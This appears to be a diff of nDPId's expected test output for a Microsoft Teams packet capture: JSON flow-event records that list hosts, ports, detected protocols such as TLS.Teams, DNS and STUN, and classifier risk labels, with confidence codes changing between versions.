+00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1587041676362,"flow_last_seen":1587041677077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":60045,"flow_avg_l4_payload_len":779,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1587041677042,"flow_last_seen":1587041677375,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":20082,"flow_avg_l4_payload_len":590,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041678029,"flow_last_seen":1587041678303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12049,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1587041681745,"flow_last_seen":1587041681895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7654,"flow_avg_l4_payload_len":382,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1587041681755,"flow_last_seen":1587041681908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7598,"flow_avg_l4_payload_len":379,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041682076,"flow_last_seen":1587041682204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12188,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1587041682077,"flow_last_seen":1587041682212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10552,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1587041682369,"flow_last_seen":1587041683086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":86354,"flow_avg_l4_payload_len":807,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1587041682376,"flow_last_seen":1587041692106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9736,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1587041682698,"flow_last_seen":1587041691929,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14416,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10412,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1587041683333,"flow_last_seen":1587041683650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15546,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041685106,"flow_last_seen":1587041685981,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8860,"flow_avg_l4_payload_len":369,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685232,"flow_last_seen":1587041685890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9605,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1587041685248,"flow_last_seen":1587041688035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11696,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041686239,"flow_last_seen":1587041686589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041687245,"flow_last_seen":1587041688061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":22353,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041694219,"flow_last_seen":1587041695993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8320,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041672419,"flow_last_seen":1587041697427,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":1674,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Telegram","breed":"Acceptable","category":"Chat"}} 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1587041684306,"flow_last_seen":1587041685465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14487,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041682809,"flow_last_seen":1587041688190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2932,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1587041692808,"flow_last_seen":1587041695538,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1225,"flow_tot_l4_payload_len":4100,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Azure","breed":"Acceptable","category":"Cloud"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1587041684306,"flow_last_seen":1587041685465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14487,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} 